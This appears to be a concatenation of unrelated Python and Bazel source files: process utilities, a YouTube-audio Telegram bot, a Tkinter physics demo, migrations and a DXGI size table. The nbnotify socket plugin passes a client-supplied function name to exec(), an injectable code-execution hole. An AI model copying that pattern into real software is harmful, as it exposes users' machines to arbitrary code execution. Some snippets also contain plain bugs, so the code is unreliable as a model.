cmd_kwargs['encoding'] = 'utf-8'
cmd_kwargs['errors'] = 'ignore'
# Start minimized
if minimized:
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = 6
cmd_kwargs['startupinfo'] = startupinfo
# Pipe output
if pipe:
cmd_kwargs['stderr'] = subprocess.PIPE
cmd_kwargs['stdout'] = subprocess.PIPE
# Done
LOG.debug('cmd_kwargs: %s', cmd_kwargs)
return cmd_kwargs
def get_json_from_command(cmd, check=True, encoding='utf-8', errors='ignore'):
"""Capture JSON content from cmd output, returns dict.
If the data can't be decoded then either an exception is raised
or an empty dict is returned depending on errors.
"""
LOG.debug('Loading JSON data from cmd: %s', cmd)
json_data = {}
try:
proc = run_program(cmd, check=check, encoding=encoding, errors=errors)
json_data = json.loads(proc.stdout)
except (subprocess.CalledProcessError, json.decoder.JSONDecodeError):
if errors != 'ignore':
raise
return json_data
def get_procs(name, exact=True, try_again=True):
"""Get process object(s) based on name, returns list of proc objects."""
LOG.debug('name: %s, exact: %s', name, exact)
processes = []
regex = f'^{name}$' if exact else name
# Iterate over all processes
for proc in psutil.process_iter():
if re.search(regex, proc.name(), re.IGNORECASE):
processes.append(proc)
# Try again?
if not processes and try_again:
time.sleep(1)
processes = get_procs(name, exact, try_again=False)
# Done
return processes
def kill_procs(name, exact=True, force=False, timeout=30):
"""Kill all processes matching name (case-insensitively).
NOTE: Under Posix systems this will send SIGINT to allow processes
to gracefully exit.
If force is True then it will wait until timeout specified and then
send SIGKILL to any processes still alive.
"""
LOG.debug(
'name: %s, exact: %s, force: %s, timeout: %s',
name, exact, force, timeout,
)
target_procs = get_procs(name, exact=exact)
for proc in target_procs:
proc.terminate()
# Force kill if necesary
if force:
results = psutil.wait_procs(target_procs, timeout=timeout)
for proc in results[1]: # Alive processes
proc.kill()
def popen_program(cmd, minimized=False, pipe=False, shell=False, **kwargs):
"""Run program and return a subprocess.Popen object."""
LOG.debug(
'cmd: %s, minimized: %s, pipe: %s, shell: %s',
cmd, minimized, pipe, shell,
)
LOG.debug('kwargs: %s', kwargs)
cmd_kwargs = build_cmd_kwargs(
cmd,
minimized=minimized,
pipe=pipe,
shell=shell,
**kwargs)
try:
# pylint: disable=consider-using-with
proc = subprocess.Popen(**cmd_kwargs)
except FileNotFoundError:
LOG.error('Command not found: %s', cmd)
raise
LOG.debug('proc: %s', proc)
# Done
return proc
def run_program(cmd, check=True, pipe=True, shell=False, **kwargs):
# pylint: disable=subprocess-run-check
"""Run program and return a subprocess.CompletedProcess object."""
LOG.debug(
'cmd: %s, check: %s, pipe: %s, shell: %s',
cmd, check, pipe, shell,
)
LOG.debug('kwargs: %s', kwargs)
cmd_kwargs = build_cmd_kwargs(
cmd,
check=check,
pipe=pipe,
shell=shell,
**kwargs)
try:
proc = subprocess.run(**cmd_kwargs)
except FileNotFoundError:
LOG.error('Command not found: %s', cmd)
raise
LOG.debug('proc: %s', proc)
# Done
return proc
def start_thread(function, args=None, daemon=True):
"""Run function as thread in background, returns Thread object."""
LOG.debug(
'Starting background thread for function: %s, args: %s, daemon: %s',
function, args, daemon,
)
args = args if args else []
thread = Thread(target=function, args=args, daemon=daemon)
thread.start()
return thread
def stop_process(proc, graceful=True):
"""Stop process.
NOTES: proc should be a subprocess.Popen obj.
If graceful is True then a SIGTERM is sent before SIGKILL.
"""
# Graceful exit
if graceful:
if os.name == 'posix' and os.geteuid() != 0: # pylint: disable=no-member
run_program(['sudo', 'kill', str(proc.pid)], check=False)
else:
proc.terminate()
time.sleep(2)
# Force exit
if os.name == 'posix' and os.geteuid() != 0: # pylint: disable=no-member
run_program(['sudo', 'kill', '-9', str(proc.pid)], check=False)
else:
proc.kill()
def wait_for_procs(name, exact=True, timeout=None):
"""Wait for all process matching name."""
LOG.debug('name: %s, exact: %s, timeout: %s', name, exact, timeout)
target_procs = get_procs(name, exact=exact)
procs = psutil.wait_procs(target_procs, timeout=timeout)
# Raise exception if necessary
if procs[1]: # Alive processes
raise psutil.TimeoutExpired(name=name, seconds=timeout)
if __name__ == '__main__':
print("This file is not meant to be called directly.")
| 7,664 | 2,596 |
# TODO: 5 (if…else Statements) Reimplement the script of Fig2.1. using three
# if…else statements rather than six if statements. [Hint: For example,
# think of == and != as “opposite” tests.]
print('Enter two integers and I will tell you',
'the relationships they satisfy.')
# read first integer
number1 = int(input('Enter first integer: '))
# read second integer
number2 = int(input('Enter second integer: '))
if number1 == number2:
print(number1, 'is equal to', number2)
else:
print(number1, 'is not equal to', number2)
if number1 < number2:
print(number1, 'is less than', number2)
else:
print(number1, 'is greater than', number2)
if number1 <= number2:
print(number1, 'is less than or equal to', number2)
else:
print(number1, 'is greater than or equal to', number2)
| 808 | 258 |
#-*- coding: utf-8 -*-
import libnbnotify
import socket
import ssl
import json
import asyncore
import re
import sys
from threading import Thread
import string
import random
import os
import BaseHTTPServer, SimpleHTTPServer
PluginInfo = {'Requirements' : { 'OS' : 'All'}, 'API': 2, 'Authors': 'webnull', 'domain': '', 'type': 'extension', 'isPlugin': False, 'Description': 'Remote control throught sockets'}
app = ""
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
class SocketInterface(SimpleHTTPServer.SimpleHTTPRequestHandler):
""" Very simple socket interface """
def log_message(self, format, *args):
return False
def ping(self, data=''):
return "pong";
def getConfigAndEntries(self, data=''):
""" Returns all configuration variables and links """
return [self.app.configGetSection('links'), self.app.Config.Config]
def getAllEntries(self, data=''):
""" Returns all links from database """
return self.app.configGetSection('links')
def notifyNewData(self, data):
""" Create new notification from data """
content = data['data']
title = data['title']
icon = data['icon']
pageID = data['pageid']
self.app.notifyNewData(content, title, icon, pageID)
def configSetKey(self, data):
""" Set configuration key """
Section = data['section']
Option = data['option']
Value = data['value']
return self.app.configSetKey(Section, Option, Value)
def saveConfiguration(self, data=''):
""" Force save configuration to file """
return self.app.saveConfiguration()
def configGetSection(self, data):
""" Returns section as dictionary
Args:
Section - name of section of ini file ([section] header)
Returns:
Dictionary - on success
False - on false
"""
return self.app.configGetSection(data)
def configGetKey(self, data):
""" Returns value of Section->Value configuration variable
Args:
Section - name of section of ini file ([section] header)
Key - variable name
Returns:
False - when section or key does not exists
False - when value of variable is "false" or "False" or just False
string value - value of variable
"""
Section = data['section']
Key = data['key']
return self.app.configGetKey(Section, Key)
def addPage(self, link):
""" Add page to database, return True if added sucessfuly """
return self.app.addPage(link)
def setType(self, data):
""" Set specified extension to handle specified link
Return md5 hash of link on success
"""
Link = data['link']
Type = data['type']
return self.app.setType(Link, Type)
def removePage(self, pageID):
""" Remove page with specified pageID """
return self.app.removePage(pageID)
def loadCommentsFromDB(self, data=''):
""" Reload comments cache from SQLite database """
return self.app.loadCommentsFromDB()
def configCheckChanges(self, data=''):
""" Reload configuration if changed """
return self.app.configCheckChanges()
def togglePlugin(self, data):
""" Activate or deactivate plugin
Plugin - name of plugin
Toggle - True or False
"""
Plugin = data['name']
Toggle = data['toggle']
if Toggle == True:
return self.app.togglePlugin(Plugin, 'activate')
return self.app.togglePlugin(Plugin, 'deactivate')
def do_POST(self):
contentLen = int(self.headers.getheader('content-length'))
postBody = self.rfile.read(contentLen)
# response
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(self.handle_read(postBody))
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write("Hello world.")
def handle_read(self, data):
global app
self.app = app
if data:
if data == "ping":
return "pong"
try:
#if t == False:
# return "Error: Cannot parse HTTP request, "+str(t)+", "+str(jsonData)
if data == False:
return "Error: Cannot parse HTTP request, empty request, "+str(jsonData)
text = json.loads(data)
if text['function'] == "handle_read" or text['function'] == "__init__" or text['function'] == "httpRequestParser":
return "Error: Function not avaliable"
if hasattr(self, text['function']):
exec("r = str(self."+text['function']+"(text['data']))")
else:
r = "Error: Function not found"
self.app.Logging.output("Socket::GET="+str(text['function'])+"&addr="+str(self.client_address[0]), "debug", False)
# send response
return json.dumps({'response': r})
except Exception as e:
self.app.Logging.output("SubgetSocketInterface: Cannot parse json data, is the client bugged? "+str(e), "warning", True)
return "Error: "+str(e)
class SocketServer:
""" Very simple connections listener """
host = "127.0.0.1"
port = 9954
def __init__(self, host, port):
self.host = host
self.port = port
def serve(self):
httpd = BaseHTTPServer.HTTPServer((self.host, self.port), SocketInterface)
httpd.serve_forever()
class PluginMain(libnbnotify.Plugin):
name = "bus"
host = "127.0.0.1"
port = 9954
bus = ""
def _pluginInit(self):
#self.initSSL()
global app
app = self.app
self.host = str(self.app.Config.getKey("bus_socket", "host", "127.0.0.1"))
if self.app.Config.getKey("bus_socket", "port") == False:
self.app.Config.setKey("bus_socket", "port", 9954)
else:
try:
self.port = int(self.app.Config.getKey("bus_socket", "port"))
except ValueError:
self.port = 9954
self.app.Config.setKey("bus_socket", "port", 9954)
if self.app.cli == False:
self.startServer()
return True
else:
return False
#def initSSL(self):
# path = os.path.expanduser("~/.nbnotify/ssl")
# create ssl directory
# if not os.path.isdir(path):
# os.mkdir(path)
# if not os.path.isfile(path+"/private.pem"):
# passwd = id_generator(size=32)
# self.app.Logging.output("Cannot find SSL cert, creating new one...", "debug", True)
# os.system("openssl genrsa -out "+path+"/private.pem 1024")
# os.system("openssl rsa -in "+path+"/private.pem -pubout > "+path+"/public.pem")
def startServer(self):
try:
self.app.Logging.output("Socket server is running on "+str(self.host)+":"+str(self.port), "debug", False)
self.bus = SocketServer(self.host, self.port)
self.thread = Thread(target=self.bus.serve)
self.thread.setDaemon(True)
self.thread.start()
except Exception as e:
self.app.Logging.output("Only one instance of nbnotify is allowed, "+str(e), "debug", False)
sys.exit(0)
| 7,815 | 2,254 |
from pyrogram import Client, filters
from pyrogram.types import (
InlineKeyboardButton,
InlineKeyboardMarkup
)
import youtube_dl
from youtube_search import YoutubeSearch
import requests
import json
import os
with open('./config.json', 'r') as config:
data = json.load(config)
bot_token = data['token']
api_id = data['api_id']
api_hash = data['api_hash']
bot = Client(
'Clara',
bot_token = bot_token,
api_id = api_id,
api_hash = api_hash
)
# Convert hh:mm:ss to seconds
def time_to_seconds(time):
stringt = str(time)
return sum(int(x) * 60 ** i for i, x in enumerate(reversed(stringt.split(':'))))
@bot.on_message(filters.command(['start']))
def start(client, message):
help_text = f'👋 Hello @{message.from_user.username}\n I\'m Clara, developed by Shambo, I can download songs from YouTube. Type /a song name\n e.g - `/a tokyo drift`'
message.reply_text(
text=help_text,
quote=False,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton('Github', url='https://github.com/typhonshambo'),
]
]
)
)
@bot.on_message(filters.command(['a']))
def a(client, message):
query = ''
for i in message.command[1:]:
query += ' ' + str(i)
print(query)
m = message.reply('🔎 Searching the song...')
ydl_opts = {"format": "bestaudio[ext=m4a]"}
try:
results = []
count = 0
while len(results) == 0 and count < 6:
if count>0:
os.times.sleep(1)
results = YoutubeSearch(query, max_results=1).to_dict()
count += 1
# results = YoutubeSearch(query, max_results=1).to_dict()
try:
link = f"https://youtube.com{results[0]['url_suffix']}"
# print(results)
title = results[0]["title"]
thumbnail = results[0]["thumbnails"][0]
duration = results[0]["duration"]
## UNCOMMENT THIS IF YOU WANT A LIMIT ON DURATION. CHANGE 1800 TO YOUR OWN PREFFERED DURATION AND EDIT THE MESSAGE (30 minutes cap) LIMIT IN SECONDS
if time_to_seconds(duration) >= 1800: # duration limit
m.edit("Exceeded video duration limit : 30 mins")
return
views = results[0]["views"]
thumb_name = f'thumb{message.message_id}.jpg'
thumb = requests.get(thumbnail, allow_redirects=True)
open(thumb_name, 'wb').write(thumb.content)
except Exception as e:
print(e)
m.edit('Found nothing. Try changing the spelling a little.')
return
except Exception as e:
m.edit(
"✖️ Found Nothing. Sorry.\n\nTry another keywork or maybe spell it properly."
)
print(str(e))
return
m.edit("⏬ Downloading.")
try:
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
info_dict = ydl.extract_info(link, download=False)
audio_file = ydl.prepare_filename(info_dict)
ydl.process_info(info_dict)
rep = f'🎧 **Title**: [{title[:35]}]({link})\n⏳ **Duration**: `{duration}`\n👁🗨 **Views**: `{views}`'
secmul, dur, dur_arr = 1, 0, duration.split(':')
for i in range(len(dur_arr)-1, -1, -1):
dur += (int(dur_arr[i]) * secmul)
secmul *= 60
message.reply_audio(audio_file, caption=rep, parse_mode='md',quote=False, title=title, duration=dur, thumb=thumb_name)
m.delete()
except Exception as e:
m.edit('❌ Error')
print(e)
try:
os.remove(audio_file)
os.remove(thumb_name)
except Exception as e:
print(e)
bot.run()
| 3,738 | 1,262 |
'''
Bouncing Ball Simulation
This is an implementation of a bouncing ball simulation using mainly the Tkinter library in Python.
It includes physics and mechanics-related concepts such as gravity, air resistance, and collision.
Before the start of the simulation, the program prompts the user to enter a value for gravity and
air density. If you do not want to enter a value, please click on cancel or the window's exit button
and the default value is going to be applied (9.8 m/s^2 for gravity and 1.225 km/m^3 for air resistance).
If a vacuum setting is preferred, please enter 0 for both windows.
by Jing Han Sun
Updated September 21, 2020
'''
import tkinter as tk
from tkinter import simpledialog
import random
import math
import sys
class Visual(tk.Tk):
'''This is the main class the will run the simulation'''
#define width and height for window
HEIGHT = 500
WIDTH = 500
#define a list of colors for the balls
colors = ['#FF4325', '#E72020', #red
'#FF9333', #orange
'#FEFA5F', #yellow
'#89F45E', '#9DFFA7', '#278A2A', #green
'#6A8EFF', '#A8E5F9', '#1FFBF8', '#3253F4', '#2A438B', #blue
'#67419E', '#C280FF', '#E12FE1', '#F1BFFC', #purple
'#FCBFE9', '#FC22A0' #pink
]
def __init__(self, argv):
super().__init__()
#create canvas
self.canvas = tk.Canvas(self, width = self.WIDTH, height = self.HEIGHT, bg = 'white')
self.canvas.pack()
self.update()
#window title
self.title('Bouncing Balls')
#add label
self.label = tk.Label(self, text = 'Welcome!')
self.label.pack()
#add quit button
self.button = tk.Button(self, text = "Quit", fg = 'red', command = self.quit())
self.button.configure(width = 10, activebackground = "#33B5E5", relief = tk.FLAT)
#self.button_window = self.canvas.create_window(10, 10, anchor = tk.NW , window = self.button)
self.button.pack()
self.update()
#create dictionary to store info about circles (radius, dir_x, dir_y)
self.circles_id = {}
# ask the user to enter a value for gravity
gravity = simpledialog.askfloat("Input", "Please enter a value for gravity (e.g.: 9.8)")
if gravity is None:
# use Earth's gravitational constant if no value is entered
gravity = 9.8
air_density = simpledialog.askfloat("Input", "Please enter a value for air density (e.g.: 1.225)")
if air_density is None:
# use the air density at STP if no value is entered
air_density = 1.225
for i in range(6):
#set up a random radius
radius = random.randint(20, 30)
#set up a random initial center for each circle
cx = random.randint(radius + 10, self.WIDTH - radius - 10)
cy = random.randint(radius + 10, self.HEIGHT - radius - 10)
#set up a random initial direction for each circle, from 1 to 360 degrees
dir_x = random.randint(-10, 10)
dir_y = random.randint(-10, 10)
#create the circle
ids = self.canvas.create_oval(cx - radius, cy - radius,
cx + radius, cy + radius,
fill = random.choice(self.colors), outline = 'black')
#fill each list for each ball's characteristics
#circles_id = {ids: [radius, dir_x, dir_y]}
self.circles_id[ids] = [radius, dir_x, dir_y]
#boolean that returns true if 2 balls overlap
self.overlaps = False
#actual animation
while True:
self.move_circles()
#if it hits a wall
self.bounce()
self.collision()
self.gravity(gravity)
self.air_resistance(air_density)
def center(self, circle):
'''Get the center coordinates of a given ball'''
x0, y0, x1, y1 = self.canvas.coords(circle)
x = (x0 + x1) / 2
y = (y0 + y1) / 2
return x, y
def distance(self, circle1, circle2):
'''Get the distance between the center of 2 given balls'''
x1, y1 = self.center(circle1)
x2, y2 = self.center(circle2)
return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)
def theta(self, x, y):
'''Get the angle in radians (between 0 and 2pi) of a ball's movement using its x and y directions'''
#first and fourth quadrant
if x > 0:
if y > 0:
return math.atan(y / x)
else:
return math.atan(y / x) + 2 * math.pi
#second and third quadrant
elif x < 0:
return math.atan(y / x) + math.pi
# x = 0 is undefined for arctan
else:
if y > 0:
return math.pi/2
else:
return 3 * math.pi/2
def overlap(self):
'''Return True if 2 balls overlap in the canvas'''
for circle1 in self.circles_id:
for circle2 in self.circles_id:
if circle1 != circle2 and \
self.distance(circle1, circle2) <= \
(self.circles_id.get(circle1)[0] + self.circles_id.get(circle2)[0]):
self.overlaps = True
return self.overlaps
def move_circles(self):
'''Movement of the balls in the frame using the generated direction for each ball'''
for i in self.circles_id:
dir_x = self.circles_id.get(i)[1]
dir_y = self.circles_id.get(i)[2]
self.canvas.move(i, dir_x, dir_y)
self.canvas.update()
def bounce(self):
'''When a ball hits one of the 4 borders of the window, it bounces off according to their initial hit angle'''
# x and y directions for a given ball
for i in self.circles_id:
dir_x = self.circles_id.get(i)[1]
dir_y = self.circles_id.get(i)[2]
#retrieve the initial coordinates of the ball
x0, y0, x1, y1 = self.canvas.coords(i)
#if it hits the left or right wall, reverse the x direction
if x0 <= 10 or x1 >= self.WIDTH - 10:
dir_x = -dir_x
# update the x direction in the direction list to continue moving
self.circles_id.get(i)[1] = dir_x
#while x0 <= 0 or x1 >= self.SIZE:
self.canvas.move(i, dir_x, dir_y)
self.canvas.update()
#if it hits the top or bottom wall, reverse the y direction
if y0 <= 10 or y1 >= self.HEIGHT - 10:
dir_y = -dir_y
#update the y direction in the direction list to continue moving
self.circles_id.get(i)[2] = dir_y
#while y0 <= 0 or y1 >= self.SIZE:
self.canvas.move(i, dir_x, dir_y)
self.canvas.update()
def collision(self):
'''Check for collisions between 2 balls in the canvas. When 2 balls collide, they will bounce away as an elastic
collision while conserving their momentum within the system involved'''
for circle1 in self.circles_id:
for circle2 in self.circles_id:
#check if the distance between 2 distinct balls is smaller than the sum of their radius
#if yes, it means collision
#give a bit of space for collision to avoid bug when overlapping
if -12 < self.distance(circle1, circle2) - \
(self.circles_id.get(circle1)[0] + self.circles_id.get(circle2)[0]) <= 0\
and circle1 != circle2:
#define initial x and y directions
x1 = self.circles_id.get(circle1)[1]
y1 = self.circles_id.get(circle1)[2]
x2 = self.circles_id.get(circle2)[1]
y2 = self.circles_id.get(circle2)[2]
#assume each ball weighs its radius squared with density pi^-1
m1 = (self.circles_id.get(circle1)[0]) ** 2
m2 = (self.circles_id.get(circle2)[0]) ** 2
#define initial speeds using the x and y directions
v1 = math.sqrt(x1 ** 2 + y1 ** 2)
v2 = math.sqrt(x2 ** 2 + y2 ** 2)
#define initial movement angles
theta1 = self.theta(x1, y1)
theta2 = self.theta(x2, y2)
#define the contact angle of the balls right before collision
phi = theta2 - theta1
# pi = pf (conservation of momentum)
#calculate the final x and y velocities after the collision
#source for the formula: https://en.wikipedia.org/wiki/Elastic_collision
x1 = ((v1 * math.cos(theta1 - phi) * (m1 - m2)) + 2 * m2 * v2 * math.cos(theta2 - phi)) \
* (math.cos(phi) / (m1 + m2)) + v1 * math.sin(theta1 - phi) * math.cos(phi + math.pi/2)
y1 = ((v1 * math.cos(theta1 - phi) * (m1 - m2)) + 2 * m2 * v2 * math.cos(theta2 - phi)) \
* (math.sin(phi) / (m1 + m2)) + v1 * math.sin(theta1 - phi) * math.sin(phi + math.pi/2)
x2 = ((v2 * math.cos(theta2 - phi) * (m2 - m1)) + 2 * m1 * v1 * math.cos(theta1 - phi)) \
* (math.cos(phi) / (m1 + m2)) + v2 * math.sin(theta2 - phi) * math.cos(phi + math.pi/2)
y2 = ((v2 * math.cos(theta2 - phi) * (m2 - m1)) + 2 * m1 * v1 * math.cos(theta1 - phi)) \
* (math.sin(phi) / (m1 + m2)) + v2 * math.sin(theta2 - phi) * math.sin(phi + math.pi/2)
#update the circles dictionary to make them continue moving after the collision
self.circles_id.get(circle1)[1] = x1
self.circles_id.get(circle1)[2] = y1
self.circles_id.get(circle2)[1] = x2
self.circles_id.get(circle2)[2] = y2
self.canvas.move(circle1, x1, y1)
self.canvas.move(circle2, x2, y2)
self.canvas.update()
#avoid pushing the ball out of the canvas when the collision happens near the canvas border
self.bounce()
def gravity(self, a):
'''Adds some gravity to the balls which attracts them to the ground'''
for i in self.circles_id:
vy = self.circles_id.get(i)[2]
#kinematic equation: (vf = vi + a * t) to apply the acceleration to the velocity
vy = vy + a / 5
#update the y velocity after applying gravity
self.circles_id.get(i)[2] = vy
# avoid pushing the ball out of the canvas when the collision happens near the canvas border
self.bounce()
def air_resistance(self, air_density):
'''Adds some air resistance to the balls which attracts them to the ground'''
for i in self.circles_id:
vx = self.circles_id.get(i)[1]
vy = self.circles_id.get(i)[2]
m = (self.circles_id.get(i)[0]) ** 2 / 1000
cd = 1.05 #drag coefficient of a cube
area = (self.circles_id.get(i)[0] / 1000) ** 2 * math.pi
#calculate the air resistance
#source for the formula: https://www.softschools.com/formulas/physics/air_resistance_formula/85/
fx = (air_density * cd * area * vx ** 2) / 2
fy = (air_density * cd * area * vy ** 2) / 2
#calculate the acceleration
ax = fx / m
ay = fy / m
# kinematic equation: (vf = vi + a * t) to apply the acceleration to the velocity
vx = vx + ax / 5
vy = vy + ay / 5
# update the y velocity after applying gravity
self.circles_id.get(i)[1] = vx
self.circles_id.get(i)[2] = vy
# avoid pushing the ball out of the canvas when the collision happens near the canvas border
self.bounce()
def drag(self):
self.canvas.bind('<B1-Motion>', self.move_circles())
if __name__ == '__main__':
Visual(sys.argv[1:]).mainloop()
| 12,371 | 3,882 |
from trame.app import get_server
from trame.widgets import vtk, trame, vuetify
from trame.ui.vuetify import SinglePageLayout
# -----------------------------------------------------------------------------
# Trame setup
# -----------------------------------------------------------------------------
server = get_server()
state, ctrl = server.state, server.controller
def reset_resolution():
state.resolution = 6
# -----------------------------------------------------------------------------
# UI setup
# -----------------------------------------------------------------------------
layout = SinglePageLayout(server)
with layout:
# Validate client life cycle
trame.LifeCycleMonitor(events=("['created']",))
layout.icon.click = ctrl.reset_camera
layout.title.set_text("Cone")
layout.toolbar.dense = True
# Toolbar
with layout.toolbar as toolbar:
vuetify.VSpacer()
vuetify.VSlider(
hide_details=True,
v_model=("resolution", 6),
max=60,
min=3,
step=1,
style="max-width: 300px;",
)
vuetify.VSwitch(
hide_details=True,
v_model=("$vuetify.theme.dark",),
)
with vuetify.VBtn(icon=True, click=reset_resolution):
vuetify.VIcon("mdi-undo")
with layout.content:
with vuetify.VContainer(fluid=True, classes="pa-0 fill-height"):
with vtk.VtkView() as view:
ctrl.reset_camera = view.reset_camera
with vtk.VtkGeometryRepresentation():
vtk.VtkAlgorithm(
vtkClass="vtkConeSource", state=("{ resolution }",)
)
# -----------------------------------------------------------------------------
# start server
# -----------------------------------------------------------------------------
if __name__ == "__main__":
server.start()
| 1,935 | 522 |
"""nobadges
Revision ID: 4d998c6ec630
Revises: 7950a35f5dbd
Create Date: 2020-05-04 11:55:22.475532
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4d998c6ec630'
down_revision = '7950a35f5dbd'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('account') as batch_op:
batch_op.drop_column('badges')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('account') as batch_op:
batch_op.add_column(sa.Column('badges', sa.TEXT(), nullable=True))
# ### end Alembic commands ###
| 752 | 300 |
# Generated by Django 2.1.15 on 2021-01-26 08:59
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0002_opinions'),
]
operations = [
migrations.RemoveField(
model_name='opinions',
name='idea_opinion',
),
]
| 323 | 118 |
def library(name, hdrs=[], srcs=[], deps=[], test_deps=[]):
native.cc_library(
name = name,
hdrs = [name + ".h"] + hdrs,
srcs = srcs,
deps = deps,
)
native.cc_test(
name = name + "_test",
srcs = [name + "_test.cc"],
deps = test_deps + [":" + name, "//:catch"],
args = ["-d=yes"],
)
| 325 | 142 |
# BPP and block sizes for all DXGI formats
# Since dxgi formats are enumerated from 0 onward there is no need for dictionary
# if some formats are not suited for storing the value is going to be set to 0
# Sizes are in BYTES
dxgi_pixel_or_block_size = [
0,
16, 16, 16, 16,
12, 12, 12, 12,
8, 8, 8, 8, 8, 8,
8, 8, 8, 8,
8, 8, 8, 8,
4, 4, 4, 4,
4, 4, 4, 4, 4, 4,
4, 4, 4, 4, 4, 4,
4, 4, 4, 4, 4,
4,
4, 4, 4,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
1, 1, 1, 1, 1, 1,
0, # DXGI_FORMAT_R1_UNORM ehm >.< ( TODO )
4, 4, 4,
8, 8, 8, # BC1
16, 16, 16, # BC2
16, 16, 16, # BC3
8, 8, 8, # BC4
16, 16, 16, # BC5
2, 2,
4, 4, 4, 4, 4, 4, 4,
16, 16, 16, # BC6
16, 16, 16, # BC7
# TODO Complete the rest
]
dxgi_compressed_formats = [
70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84,
94, 95, 96, 97, 98, 99
] | 859 | 578 |